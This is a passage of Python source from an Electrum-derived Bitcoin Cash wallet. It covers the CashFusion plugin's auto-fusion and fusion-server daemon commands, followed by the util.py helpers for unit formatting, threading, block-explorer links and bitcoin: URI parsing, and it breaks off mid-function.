                # below.
                continue
            # prune dead autofusions from the weak set
            for f in list(wallet._fusions_auto):
                if not f.is_alive():
                    wallet._fusions_auto.discard(f)
            active_autofusions = list(wallet._fusions_auto)
            if dont_start_fusions and not active_autofusions:
                continue
            num_auto = len(active_autofusions)
            wallet_conf = Conf(wallet)
            eligible, ineligible, sum_value, has_unconfirmed, has_coinbase = select_coins(wallet)
            target_num_auto, confirmed_only = get_target_params_1(wallet, wallet_conf, active_autofusions, eligible)
            if confirmed_only and has_unconfirmed:
                for f in list(wallet._fusions_auto):
                    f.stop('Wallet has unconfirmed coins... waiting.', not_if_running = True)
                continue
            if not dont_start_fusions and num_auto < min(target_num_auto, MAX_AUTOFUSIONS_PER_WALLET):
                # we don't have enough auto-fusions running, so start one
                fraction = get_target_params_2(wallet_conf, sum_value)
                chosen_buckets = select_random_coins(wallet, fraction, eligible)
                coins = [c for l in chosen_buckets for c in l]
                if not coins:
                    self.print_error("auto-fusion skipped due to lack of coins")
                    continue
                if wallet_conf.fusion_mode == 'consolidate':
                    max_outputs = CONSOLIDATE_MAX_OUTPUTS
                    if len(chosen_buckets) < (MIN_TX_COMPONENTS - max_outputs):
                        self.print_error("consolidating auto-fusion skipped due to lack of unrelated coins")
                        continue
                else:
                    max_outputs = None
                try:
                    f = self.start_fusion(wallet, password, coins, max_outputs = max_outputs, inactive_timeout = AUTOFUSE_INACTIVE_TIMEOUT)
                    self.print_error("started auto-fusion")
                except RuntimeError as e:
                    # NOTE: this `return` aborts the whole pass (all wallets),
                    # not just this wallet's iteration
                    self.print_error(f"auto-fusion skipped due to error: {e}")
                    return
                wallet._fusions_auto.add(f)
def start_fusion_server(self, network, bindhost, port, upnp = None, announcehost = None, donation_address = None):
    """Launch the local FusionServer; returns its (host, port)."""
    if self.fusion_server:
        raise RuntimeError("server already running")
    # only a genuine Address instance is accepted; anything else becomes None
    donation_address = (isinstance(donation_address, Address) and donation_address) or None
    server = FusionServer(self.config, network, bindhost, port, upnp = upnp, announcehost = announcehost, donation_address = donation_address)
    self.fusion_server = server
    server.start()
    return server.host, server.port
def stop_fusion_server(self):
    """Best-effort shutdown of the local fusion server (no-op if absent)."""
    try:
        server = self.fusion_server
        server.stop('server stopped by operator')
        self.fusion_server = None
    except Exception:
        # server was None or already stopped; nothing to do
        pass
def update_coins_ui(self, wallet):
    """No-op hook.  The Qt plugin subclass overrides this to signal the main
    thread to refresh the coins tab; the Fusion thread calls it (from its own
    thread context) whenever it freezes or unfreezes coins."""
def notify_server_status(self, b, tup : tuple = None):
    """Report server status; the Qt subclass overrides this to inform the
    GUI about bad servers.  Here we only log failures."""
    if not b:
        self.print_error("notify_server_status:", b, str(tup))
@hook
def donation_address(self, window) -> Optional[Tuple[str,Address]]:
    ''' Plugin API: Returns a tuple of (description, Address) or None. This
    is the donation address that we as a client got from the remote server
    (as opposed to the donation address we announce if we are a server). '''
    if self.remote_donation_address and Address.is_valid(self.remote_donation_address):
        return (self.fullname() + " " + _("Server") + ": " + self.get_server()[0], Address.from_string(self.remote_donation_address))
    # falls through to an implicit None when no valid remote address is known
@daemon_command
def fusion_server_start(self, daemon, config):
    # Usage:
    #   ./oregano daemon fusion_server_start <bindhost>(,<announcehost>) <port>
    #   ./oregano daemon fusion_server_start <bindhost>(,<announcehost>) <port> upnp
    #   ./oregano daemon fusion_server_start <bindhost>(,<announcehost>) <port> <donation_addr>
    #   ./oregano daemon fusion_server_start <bindhost>(,<announcehost>) <port> upnp <donation_addr>
    # e.g.:
    #   ./oregano daemon fusion_server_start 0.0.0.0,myfusionserver.com 8787 upnp bitcoincash:qpxiweuqoiweweqeweqw
    #
    # The main server port will be bound on <bindhost>:<port>.
    # Covert submissions will be bound on <bindhost>:<ephemeral_port> (the port is chosen by the OS)
    # The main server will tell clients to connect to <announcehost>:<ephemeral_port> .
    # The default announcehost is based on an autodetection system, which may not work for some server networking setups.
    network = daemon.network
    if not network:
        return "error: cannot run fusion server without an SPV server connection"
    def invoke(firstarg = '0.0.0.0', sport='8787', upnp_str = None, addr_str = None):
        # firstarg is "<bindhost>" or "<bindhost>,<announcehost>"
        bindhost, *extrahosts = firstarg.split(',')
        if len(extrahosts) > 1:
            raise Exception("too many hosts")
        elif len(extrahosts) == 1:
            [announcehost,] = extrahosts
        else:
            announcehost = None
        port = int(sport)
        pnp = get_upnp() if upnp_str == 'upnp' else None
        if not pnp and not addr_str:
            # third arg may be addr_str, so swap the args
            addr_str = upnp_str
            upnp_str = None
        addr = None
        if addr_str:
            assert Address.is_valid(addr_str), "Invalid donation address specified"
            addr = Address.from_string(addr_str)
        return self.start_fusion_server(network, bindhost, port, upnp = pnp, announcehost = announcehost, donation_address = addr)
    try:
        host, port = invoke(*config.get('subargs', ()))
    except Exception as e:
        # report the failure back over the daemon command channel
        import traceback, sys; traceback.print_exc(file=sys.stderr)
        return f'error: {str(e)}'
    return (host, port)
@daemon_command
def fusion_server_stop(self, daemon, config):
    """Daemon command: shut the local fusion server down."""
    self.stop_fusion_server()
    return 'ok'
@daemon_command
def fusion_server_status(self, daemon, config):
    """Daemon command: report per-tier waiting pool sizes."""
    if not self.fusion_server:
        return "fusion server not running"
    pools = self.fusion_server.waiting_pools
    return dict(poolsizes = {tier: len(p.pool) for tier, p in pools.items()})
@daemon_command
def fusion_server_fuse(self, daemon, config):
    """Daemon command: force-start a fuse round on the given tier; returns
    the number of clients fused."""
    if self.fusion_server is None:
        return
    subargs = config.get('subargs', ())
    if len(subargs) != 1:
        return "expecting tier"
    tier = int(subargs[0])
    return self.fusion_server.start_fuse(tier)
|
util.py | # Electrum - lightweight Bitcoin client
# Copyright (C) 2011 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import binascii
import os, sys, re, json
from collections import defaultdict
from datetime import datetime
import decimal
from decimal import Decimal
import traceback
import urllib
import threading
import hmac
import stat
from .i18n import _
import urllib.request, urllib.parse, urllib.error
import queue
def inv_dict(d):
    """Return a new dict with keys and values swapped."""
    return dict((value, key) for key, value in d.items())
# Map of unit name -> number of decimal places (relative to 1 satoshi).
base_units = {'BTC':8, 'mBTC':5, 'bits':2, 'sat':0}
# Reverse map: decimal places -> unit name.
base_units_inverse = inv_dict(base_units)
base_units_list = ['BTC', 'mBTC', 'bits', 'sat'] # list(dict) does not guarantee order
def decimal_point_to_base_unit_name(dp: int) -> str:
    """Map a decimal-point count to its unit name, e.g. 8 -> "BTC"."""
    if dp not in base_units_inverse:
        raise Exception('Unknown base unit')
    return base_units_inverse[dp]
def base_unit_name_to_decimal_point(unit_name: str) -> int:
    """Map a unit name to its decimal-point count, e.g. "BTC" -> 8."""
    if unit_name not in base_units:
        raise Exception('Unknown base unit')
    return base_units[unit_name]
def normalize_version(v):
    """Parse a dotted version string into a list of ints, dropping trailing
    ".0" components so that e.g. "3.2.0" compares equal to "3.2"."""
    stripped = re.sub(r'(\.0+)*$', '', v)
    return [int(part) for part in stripped.split(".")]
# Raised by coin selection / transaction construction when the wallet
# cannot cover the requested amount.
class NotEnoughFunds(Exception): pass

class NoDynamicFeeEstimates(Exception):
    # raised when the fee estimator has no data yet
    def __str__(self):
        return _('Dynamic fee estimates not available')

class InvalidPassword(Exception):
    def __str__(self):
        return _("Incorrect password")

class FileImportFailed(Exception):
    # import from file failed; .message carries a human-readable reason
    def __init__(self, message=''):
        self.message = str(message)
    def __str__(self):
        return _("Failed to import from file.") + "\n" + self.message

class FileExportFailed(Exception):
    # export to file failed; .message carries a human-readable reason
    def __init__(self, message=''):
        self.message = str(message)
    def __str__(self):
        return _("Failed to export to file.") + "\n" + self.message

class TimeoutException(Exception):
    def __init__(self, message=''):
        self.message = str(message)
    def __str__(self):
        # fall back to a generic translated message when none was given
        if not self.message:
            return _("Operation timed out.")
        return self.message

class WalletFileException(Exception): pass

class BitcoinException(Exception): pass

# Throw this exception to unwind the stack like when an error occurs.
# However unlike other exceptions the user won't be informed.
class UserCancelled(Exception):
    '''An exception that is suppressed from the user'''
    pass
class Satoshis(object):
    """Lightweight wrapper tagging an integer as a satoshi amount."""

    def __new__(cls, value):
        instance = super(Satoshis, cls).__new__(cls)
        instance.value = value
        return instance

    def __repr__(self):
        return 'Satoshis(%d)' % self.value

    def __str__(self):
        # rendered via the module's canonical satoshi formatter
        return format_satoshis(self.value) + " BTC"
class Fiat(object):
    """Lightweight wrapper pairing a Decimal amount with a currency code."""

    def __new__(cls, value, ccy):
        instance = super(Fiat, cls).__new__(cls)
        instance.ccy = ccy
        instance.value = value
        return instance

    def __repr__(self):
        return 'Fiat(%s)' % self.__str__()

    def __str__(self):
        if self.value.is_nan():
            # no exchange-rate data available
            return _('No Data')
        return "{:.2f}".format(self.value) + ' ' + self.ccy
class MyEncoder(json.JSONEncoder):
    # JSON encoder aware of this app's domain objects.
    def default(self, obj):
        # imported here to avoid a circular import at module load time
        from .transaction import Transaction
        if isinstance(obj, Transaction):
            return obj.as_dict()
        if isinstance(obj, Satoshis):
            return str(obj)
        if isinstance(obj, Fiat):
            return str(obj)
        if isinstance(obj, Decimal):
            return str(obj)
        if isinstance(obj, datetime):
            # 'YYYY-MM-DD HH:MM:SS.mmm' (microseconds trimmed to millis)
            return obj.isoformat(' ')[:-3]
        if isinstance(obj, set):
            return list(obj)
        return super(MyEncoder, self).default(obj)
class PrintError(object):
    '''A handy base class'''
    # subclasses set this to gate print_error() on the global `verbosity`
    verbosity_filter = ''

    def diagnostic_name(self):
        # label prepended to every message; override for a nicer name
        return self.__class__.__name__

    def print_error(self, *msg):
        # printed only when this class's filter is enabled (or verbosity == '*')
        if self.verbosity_filter in verbosity or verbosity == '*':
            print_stderr("[%s]" % self.diagnostic_name(), *msg)

    def print_stderr(self, *msg):
        print_stderr("[%s]" % self.diagnostic_name(), *msg)

    def print_msg(self, *msg):
        print_msg("[%s]" % self.diagnostic_name(), *msg)
class ThreadJob(PrintError):
    """A job that is run periodically from a thread's main loop. run() is
    called from that thread's context.
    """
    def run(self):
        """Called periodically from the thread"""
        pass
class DebugMem(ThreadJob):
    '''A handy class for debugging GC memory leaks'''
    def __init__(self, classes, interval=30):
        self.next_time = 0          # unix time of the next scheduled scan
        self.classes = classes      # classes whose live instances are counted
        self.interval = interval    # seconds between scans

    def mem_stats(self):
        import gc
        self.print_error("Start memscan")
        # collect first so only genuinely reachable objects are counted
        gc.collect()
        objmap = defaultdict(list)
        for obj in gc.get_objects():
            for class_ in self.classes:
                if isinstance(obj, class_):
                    objmap[class_].append(obj)
        for class_, objs in objmap.items():
            self.print_error("%s: %d" % (class_.__name__, len(objs)))
        self.print_error("Finish memscan")

    def run(self):
        # called frequently by DaemonThread.run_jobs; rate-limit to `interval`
        if time.time() > self.next_time:
            self.mem_stats()
            self.next_time = time.time() + self.interval
class DaemonThread(threading.Thread, PrintError):
    """ daemon thread that terminates cleanly """
    verbosity_filter = 'd'

    def __init__(self):
        threading.Thread.__init__(self)
        # Remember the spawning thread: is_running() reports False once it
        # dies, so this thread winds down along with its parent.
        # fix: threading.currentThread() is deprecated since Python 3.10
        # (camelCase alias); use the PEP 8 name threading.current_thread().
        self.parent_thread = threading.current_thread()
        self.running = False
        self.running_lock = threading.Lock()
        self.job_lock = threading.Lock()
        self.jobs = []  # ThreadJob instances executed by run_jobs()

    def add_jobs(self, jobs):
        """Register additional periodic jobs."""
        with self.job_lock:
            self.jobs.extend(jobs)

    def run_jobs(self):
        # Don't let a throwing job disrupt the thread, future runs of
        # itself, or other jobs. This is useful protection against
        # malformed or malicious server responses
        with self.job_lock:
            for job in self.jobs:
                try:
                    job.run()
                except Exception as e:
                    traceback.print_exc(file=sys.stderr)

    def remove_jobs(self, jobs):
        """Unregister jobs; raises ValueError for a job that was never added."""
        with self.job_lock:
            for job in jobs:
                self.jobs.remove(job)

    def start(self):
        """Mark the thread running and start it."""
        with self.running_lock:
            self.running = True
        return threading.Thread.start(self)

    def is_running(self):
        # also reports False once the spawning thread has died
        with self.running_lock:
            return self.running and self.parent_thread.is_alive()

    def stop(self):
        """Request a clean shutdown; the run loop should poll is_running()."""
        with self.running_lock:
            self.running = False

    def on_stop(self):
        # subclass hook: call when run() exits, to detach from the JVM on Android
        if 'ANDROID_DATA' in os.environ:
            import jnius
            jnius.detach()
            self.print_error("jnius detach")
        self.print_error("stopped")
# Module-global verbosity flag consulted by print_error()/PrintError.
# '*' means "print everything"; '' (falsy) silences print_error() output.
verbosity = '*'
def set_verbosity(b):
    """Set the module-global verbosity flag (see PrintError/print_error)."""
    global verbosity
    verbosity = b
def print_error(*args):
    """Write args to stderr, but only when verbosity is enabled."""
    if not verbosity:
        return
    print_stderr(*args)
def print_stderr(*args):
    """Write all args, space-separated, to stderr and flush."""
    line = " ".join(str(item) for item in args)
    sys.stderr.write(line + "\n")
    sys.stderr.flush()
def print_msg(*args):
    """Write all args, space-separated, to stdout and flush."""
    line = " ".join(str(item) for item in args)
    sys.stdout.write(line + "\n")
    sys.stdout.flush()
def json_encode(obj):
    """Serialize obj to pretty JSON via MyEncoder; falls back to repr()
    for objects that are not JSON-serializable."""
    try:
        encoded = json.dumps(obj, sort_keys=True, indent=4, cls=MyEncoder)
    except TypeError:
        encoded = repr(obj)
    return encoded
def json_decode(x):
    """Parse JSON text (floats decoded as Decimal); on any failure the
    input is returned unchanged.

    fix: the bare `except:` also swallowed SystemExit/KeyboardInterrupt;
    narrowed to `except Exception` (still covers JSONDecodeError and the
    TypeError raised for non-string input).
    """
    try:
        return json.loads(x, parse_float=Decimal)
    except Exception:
        return x
# taken from Django Source Code
def constant_time_compare(val1, val2):
    """Return True if the two strings are equal, False otherwise."""
    # hmac.compare_digest runs in time independent of how many leading
    # characters match, defeating timing side-channel attacks
    return hmac.compare_digest(to_bytes(val1, 'utf8'), to_bytes(val2, 'utf8'))
# decorator that prints execution time
def profiler(func):
    """Decorator: log the wrapped function's wall-clock run time via
    print_error.

    fix: the original returned a bare lambda, losing the wrapped function's
    __name__/__doc__; functools.wraps preserves them.
    """
    from functools import wraps

    @wraps(func)
    def wrapper(*args, **kw_args):
        t0 = time.time()
        result = func(*args, **kw_args)
        elapsed = time.time() - t0
        print_error("[profiler]", func.__name__, "%.4f" % elapsed)
        return result
    return wrapper
def android_ext_dir():
    # External storage directory path (Android only; requires pyjnius)
    import jnius
    env = jnius.autoclass('android.os.Environment')
    return env.getExternalStorageDirectory().getPath()
def android_data_dir():
    # App-private data directory of the Kivy PythonActivity (Android only)
    import jnius
    PythonActivity = jnius.autoclass('org.kivy.android.PythonActivity')
    return PythonActivity.mActivity.getFilesDir().getPath() + '/data'
def android_headers_dir():
    # External directory holding the blockchain headers file; created lazily
    d = android_ext_dir() + '/org.electrum.electrum'
    if not os.path.exists(d):
        try:
            os.mkdir(d)
        except FileExistsError:
            pass # in case of race
    return d
def android_check_data_dir():
    """ if needed, move old directory to sandbox """
    ext_dir = android_ext_dir()
    data_dir = android_data_dir()
    old_electrum_dir = ext_dir + '/electrum'
    # one-time migration: only when the new dir is absent and the old exists
    if not os.path.exists(data_dir) and os.path.exists(old_electrum_dir):
        import shutil
        # move the (large) headers file to the shared headers dir first
        new_headers_path = android_headers_dir() + '/blockchain_headers'
        old_headers_path = old_electrum_dir + '/blockchain_headers'
        if not os.path.exists(new_headers_path) and os.path.exists(old_headers_path):
            print_error("Moving headers file to", new_headers_path)
            shutil.move(old_headers_path, new_headers_path)
        print_error("Moving data to", data_dir)
        shutil.move(old_electrum_dir, data_dir)
    return data_dir
def get_headers_dir(config):
    """Directory that holds the blockchain headers file."""
    if 'ANDROID_DATA' in os.environ:
        return android_headers_dir()
    return config.path
def assert_datadir_available(config_path):
    """Raise FileNotFoundError if the datadir vanished while running."""
    if os.path.exists(config_path):
        return
    raise FileNotFoundError(
        'Electrum datadir does not exist. Was it deleted while running?' + '\n' +
        'Should be at {}'.format(config_path))
def assert_file_in_datadir_available(path, config_path):
    """Raise FileNotFoundError for a missing file, distinguishing whether the
    whole datadir is gone or just this one file."""
    if os.path.exists(path):
        return
    # if the datadir itself is gone, this raises a more specific message
    assert_datadir_available(config_path)
    raise FileNotFoundError(
        'Cannot find file but datadir is there.' + '\n' +
        'Should be at {}'.format(path))
def assert_bytes(*args):
    """
    porting helper, assert args type
    """
    try:
        for value in args:
            assert isinstance(value, (bytes, bytearray))
    except:
        # log the offending types before re-raising, to aid debugging
        print('assert bytes failed', list(map(type, args)))
        raise
def assert_str(*args):
    """
    porting helper, assert args type
    """
    for value in args:
        assert isinstance(value, str)
def to_string(x, enc):
    """Decode bytes-like x with `enc`; pass str through; TypeError otherwise."""
    if isinstance(x, str):
        return x
    if isinstance(x, (bytes, bytearray)):
        return x.decode(enc)
    raise TypeError("Not a string or bytes like object")
def to_bytes(something, encoding='utf8'):
    """
    cast string to bytes() like object, but for python2 support it's bytearray copy
    """
    if isinstance(something, bytes):
        return something
    if isinstance(something, str):
        return something.encode(encoding)
    if isinstance(something, bytearray):
        return bytes(something)
    raise TypeError("Not a string or bytes like object")
bfh = bytes.fromhex  # hex str -> bytes
hfu = binascii.hexlify  # bytes -> lowercase hex, as bytes
def bh2u(x):
    """
    str with hex representation of a bytes-like object

    fix: the doctest previously showed '01020A', but binascii.hexlify
    produces lowercase hex, so the correct output is '01020a'.

    >>> x = bytes((1, 2, 10))
    >>> bh2u(x)
    '01020a'
    :param x: bytes
    :rtype: str
    """
    return hfu(x).decode('ascii')
def user_dir():
    """Per-user Electrum data directory (platform dependent); None when no
    suitable home directory can be determined."""
    if 'ANDROID_DATA' in os.environ:
        return android_check_data_dir()
    if os.name == 'posix':
        return os.path.join(os.environ["HOME"], ".electrum")
    if "APPDATA" in os.environ:
        return os.path.join(os.environ["APPDATA"], "Electrum")
    if "LOCALAPPDATA" in os.environ:
        return os.path.join(os.environ["LOCALAPPDATA"], "Electrum")
    #raise Exception("No home directory found in environment variables.")
    return None
def is_valid_email(s):
    """Very loose email check: something@something.something"""
    return re.match(r"[^@]+@[^@]+\.[^@]+", s) is not None
def format_satoshis_plain(x, decimal_point = 8):
    """Display a satoshi amount scaled. Always uses a '.' as a decimal
    point and has no thousands separator"""
    scaled = Decimal(x) / pow(10, decimal_point)
    return "{:.8f}".format(scaled).rstrip('0').rstrip('.')
def format_satoshis(x, num_zeros=0, decimal_point=8, precision=None, is_diff=False, whitespaces=False):
    """Format integer amount x (in satoshis) as a human-readable string.

    num_zeros     -- minimum number of fractional digits kept after stripping
    decimal_point -- scale: x is divided by 10**decimal_point
    precision     -- max fractional digits shown (defaults to decimal_point)
    is_diff       -- prefix positive amounts with '+'
    whitespaces   -- pad to a fixed 15-char width for column alignment
    """
    from locale import localeconv
    if x is None:
        return 'unknown'
    if precision is None:
        precision = decimal_point
    decimal_format = ".0" + str(precision) if precision > 0 else ""
    if is_diff:
        decimal_format = '+' + decimal_format
    result = ("{:" + decimal_format + "f}").format(x / pow (10, decimal_point)).rstrip('0')
    integer_part, fract_part = result.split(".")
    # use the locale's decimal separator in the rendered string
    dp = localeconv()['decimal_point']
    if len(fract_part) < num_zeros:
        fract_part += "0" * (num_zeros - len(fract_part))
    result = integer_part + dp + fract_part
    if whitespaces:
        result += " " * (decimal_point - len(fract_part))
        result = " " * (15 - len(result)) + result
    return result
FEERATE_PRECISION = 1  # num fractional decimal places for sat/byte fee rates
_feerate_quanta = Decimal(10) ** (-FEERATE_PRECISION)

def format_fee_satoshis(fee, num_zeros=0):
    """Format a sat/byte fee rate with FEERATE_PRECISION decimals."""
    return format_satoshis(fee, num_zeros, 0, precision=FEERATE_PRECISION)

def quantize_feerate(fee):
    """Strip sat/byte fee rate of excess precision."""
    if fee is None:
        return None
    return Decimal(fee).quantize(_feerate_quanta, rounding=decimal.ROUND_HALF_DOWN)
def timestamp_to_datetime(timestamp):
    """Unix timestamp -> local datetime; None passes through."""
    return None if timestamp is None else datetime.fromtimestamp(timestamp)

def format_time(timestamp):
    """Unix timestamp -> 'YYYY-MM-DD HH:MM:SS.mmm' local string."""
    date = timestamp_to_datetime(timestamp)
    if not date:
        return _("Unknown")
    return date.isoformat(' ')[:-3]
# Takes a timestamp and returns a string with the approximation of the age
def age(from_date, since_date = None, target_tz=None, include_seconds=False):
    """Human-readable age of a unix timestamp, e.g. '5 minutes ago'."""
    if from_date is None:
        return "Unknown"
    from_time = datetime.fromtimestamp(from_date)
    if since_date is None:
        since_date = datetime.now(target_tz)
    phrase = time_difference(from_time - since_date, include_seconds)
    if from_time < since_date:
        return phrase + " ago"
    return "in " + phrase

def time_difference(distance_in_time, include_seconds):
    """Approximate a timedelta in words; the sign is ignored."""
    total_seconds = int(round(abs(distance_in_time.days * 86400 + distance_in_time.seconds)))
    total_minutes = int(round(total_seconds / 60))
    if total_minutes <= 1:
        if not include_seconds:
            return "less than a minute" if total_minutes == 0 else "1 minute"
        for threshold in (5, 10, 20):
            if total_seconds < threshold:
                return "less than %s seconds" % threshold
        if total_seconds < 40:
            return "half a minute"
        if total_seconds < 60:
            return "less than a minute"
        return "1 minute"
    if total_minutes < 45:
        return "%s minutes" % total_minutes
    if total_minutes < 90:
        return "about 1 hour"
    if total_minutes < 1440:
        return "about %d hours" % (round(total_minutes / 60.0))
    if total_minutes < 2880:
        return "1 day"
    # NOTE(review): 43220 looks like a typo for 43200 (= 30 days in minutes);
    # preserved as-is to keep behavior identical -- confirm upstream intent.
    if total_minutes < 43220:
        return "%d days" % (round(total_minutes / 1440))
    if total_minutes < 86400:
        return "about 1 month"
    if total_minutes < 525600:
        return "%d months" % (round(total_minutes / 43200))
    if total_minutes < 1051200:
        return "about 1 year"
    return "over %d years" % (round(total_minutes / 525600))
# Catalog of mainnet block explorers: name -> (base_url, {kind: path_prefix}).
# 'tx' and 'addr' kinds are used by block_explorer_URL() below.
mainnet_block_explorers = {
    'Biteasy.com': ('https://www.biteasy.com/blockchain/',
                    {'tx': 'transactions/', 'addr': 'addresses/'}),
    'Bitflyer.jp': ('https://chainflyer.bitflyer.jp/',
                    {'tx': 'Transaction/', 'addr': 'Address/'}),
    'Blockchain.info': ('https://blockchain.info/',
                    {'tx': 'tx/', 'addr': 'address/'}),
    'blockchainbdgpzk.onion': ('https://blockchainbdgpzk.onion/',
                    {'tx': 'tx/', 'addr': 'address/'}),
    'Blockr.io': ('https://btc.blockr.io/',
                    {'tx': 'tx/info/', 'addr': 'address/info/'}),
    'Blocktrail.com': ('https://www.blocktrail.com/BTC/',
                    {'tx': 'tx/', 'addr': 'address/'}),
    'BTC.com': ('https://chain.btc.com/',
                    {'tx': 'tx/', 'addr': 'address/'}),
    'Chain.so': ('https://www.chain.so/',
                    {'tx': 'tx/BTC/', 'addr': 'address/BTC/'}),
    'Insight.is': ('https://insight.bitpay.com/',
                    {'tx': 'tx/', 'addr': 'address/'}),
    'TradeBlock.com': ('https://tradeblock.com/blockchain/',
                    {'tx': 'tx/', 'addr': 'address/'}),
    'BlockCypher.com': ('https://live.blockcypher.com/btc/',
                    {'tx': 'tx/', 'addr': 'address/'}),
    'Blockchair.com': ('https://blockchair.com/bitcoin/',
                    {'tx': 'transaction/', 'addr': 'address/'}),
    'blockonomics.co': ('https://www.blockonomics.co/',
                    {'tx': 'api/tx?txid=', 'addr': '#/search?q='}),
    'OXT.me': ('https://oxt.me/',
                    {'tx': 'transaction/', 'addr': 'address/'}),
    'system default': ('blockchain:/',
                    {'tx': 'tx/', 'addr': 'address/'}),
}

# Same catalog for testnet.
testnet_block_explorers = {
    'Blocktrail.com': ('https://www.blocktrail.com/tBTC/',
                       {'tx': 'tx/', 'addr': 'address/'}),
    'system default': ('blockchain://000000000933ea01ad0ee984209779baaec3ced90fa3f408719526f8d77f4943/',
                       {'tx': 'tx/', 'addr': 'address/'}),
}
def block_explorer_info():
    """Explorer catalog appropriate for the active network."""
    from . import constants
    if constants.net.TESTNET:
        return testnet_block_explorers
    return mainnet_block_explorers
def block_explorer(config):
    """Name of the configured block explorer (default 'Blocktrail.com')."""
    name = config.get('block_explorer', 'Blocktrail.com')
    return name
def block_explorer_tuple(config):
    """(base_url, kind_map) for the configured explorer; None if unknown."""
    explorers = block_explorer_info()
    return explorers.get(block_explorer(config))
def block_explorer_URL(config, kind, item):
    """Full explorer URL for a 'tx' or 'addr' item; None if unsupported."""
    be_tuple = block_explorer_tuple(config)
    if not be_tuple:
        return None
    base_url, kind_map = be_tuple
    kind_str = kind_map.get(kind)
    if not kind_str:
        return None
    return base_url + kind_str + item
# URL decode
#_ud = re.compile('%([0-9a-hA-H]{2})', re.MULTILINE)
#urldecode = lambda x: _ud.sub(lambda m: chr(int(m.group(1), 16)), x)
def parse_URI(uri, on_pr=None):
    """Parse a 'bitcoin:' URI (or bare address) into a dict with keys such as
    'address', 'amount' (in satoshis), 'message'/'memo', 'time', 'exp',
    'r', 'sig', 'name'.

    Raises on invalid addresses/URIs.  If on_pr is given and the URI carries
    a payment request (r= or name=+sig=), the request is fetched/parsed on a
    daemon thread and handed to on_pr(request).

    fixes: regex made a raw string ('\\.' in a non-raw literal is an invalid
    escape, a SyntaxWarning since Python 3.12); Thread.setDaemon() is
    deprecated, replaced by assigning .daemon.
    """
    from . import bitcoin
    from .bitcoin import COIN

    if ':' not in uri:
        # bare-address form
        if not bitcoin.is_address(uri):
            raise Exception("Not a bitcoin address")
        return {'address': uri}

    u = urllib.parse.urlparse(uri)
    if u.scheme != 'bitcoin':
        raise Exception("Not a bitcoin URI")
    address = u.path

    # python for android fails to parse query
    if address.find('?') > 0:
        address, query = u.path.split('?')
        pq = urllib.parse.parse_qs(query)
    else:
        pq = urllib.parse.parse_qs(u.query)

    for k, v in pq.items():
        if len(v) != 1:
            raise Exception('Duplicate Key', k)

    out = {k: v[0] for k, v in pq.items()}
    if address:
        if not bitcoin.is_address(address):
            raise Exception("Invalid bitcoin address:" + address)
        out['address'] = address
    if 'amount' in out:
        am = out['amount']
        # 'NNNXk' form: value times 10**(k-8); otherwise plain BTC amount
        m = re.match(r'([0-9\.]+)X([0-9])', am)
        if m:
            k = int(m.group(2)) - 8
            amount = Decimal(m.group(1)) * pow(Decimal(10), k)
        else:
            amount = Decimal(am) * COIN
        out['amount'] = int(amount)
    if 'message' in out:
        out['memo'] = out['message']
    if 'time' in out:
        out['time'] = int(out['time'])
    if 'exp' in out:
        out['exp'] = int(out['exp'])
    if 'sig' in out:
        out['sig'] = bh2u(bitcoin.base_decode(out['sig'], None, base=58))

    r = out.get('r')
    sig = out.get('sig')
    name = out.get('name')
    if on_pr and (r or (name and sig)):
        def get_payment_request_thread():
            from . import paymentrequest as pr
            if name and sig:
                s = pr.serialize_request(out).SerializeToString()
                request = pr.PaymentRequest(s)
            else:
                request = pr.get_payment_request(r)
            if on_pr:
                on_pr(request)
        t = threading.Thread(target=get_payment_request_thread)
        t.daemon = True
        t.start()
    return out
def create_URI(addr, amount, message):
    """Build a 'bitcoin:' URI for addr with optional amount/message query
    parameters; returns '' for an invalid address."""
    from . import bitcoin
    if not bitcoin.is_address(addr):
        return ""
    query = []
    if amount:
        query.append('amount=%s' % format_satoshis_plain(amount))
    if message:
        query.append('message=%s' % urllib.parse.quote(message))
    p = urllib.parse.ParseResult(scheme='bitcoin', netloc='', path=addr, params='', query='&'.join(query), fragment='')
    return urllib.parse.urlunparse(p)
# Python bug (http://bugs.python.org/issue1927) causes raw_input
# to be redirected improperly between stdin/stderr on Unix systems
#TODO: py3
def raw_input(prompt=None):
    # echo the prompt on stdout ourselves, then defer to the real input()
    if prompt:
        sys.stdout.write(prompt)
    return builtin_raw_input()

import builtins
# keep a reference to the original input() before monkey-patching it below;
# raw_input() resolves builtin_raw_input at call time, so defining the
# function first is safe
builtin_raw_input = builtins.input
builtins.input = raw_input
def parse_json(message):
    """Split one newline-terminated JSON object off the front of `message`.

    Returns (obj, rest): obj is None when no complete line is buffered yet
    or when the line is not valid JSON/UTF-8; rest is the unconsumed tail.

    fix: the bare `except:` (which also swallowed SystemExit and
    KeyboardInterrupt) is narrowed to `except Exception`.
    """
    # TODO: check \r\n pattern
    n = message.find(b'\n')
    if n == -1:
        # no complete line buffered yet; caller keeps accumulating
        return None, message
    try:
        j = json.loads(message[0:n].decode('utf8'))
    except Exception:
        # bad UTF-8 or bad JSON: drop the line, return the remainder
        j = None
    return j, message[n+1:]
# Raised by SocketPipe/QueuePipe when a read times out.
class timeout(Exception):
    pass

# imports used by the pipe classes below
import socket
import json
import ssl
import time
class SocketPipe:
    # Newline-delimited JSON messages over a (possibly SSL-wrapped) socket.
    def __init__(self, socket):
        self.socket = socket
        self.message = b''            # receive buffer of undecoded bytes
        self.set_timeout(0.1)
        self.recv_time = time.time()  # last time any data arrived

    def set_timeout(self, t):
        self.socket.settimeout(t)

    def idle_time(self):
        # seconds since we last received anything
        return time.time() - self.recv_time

    def get(self):
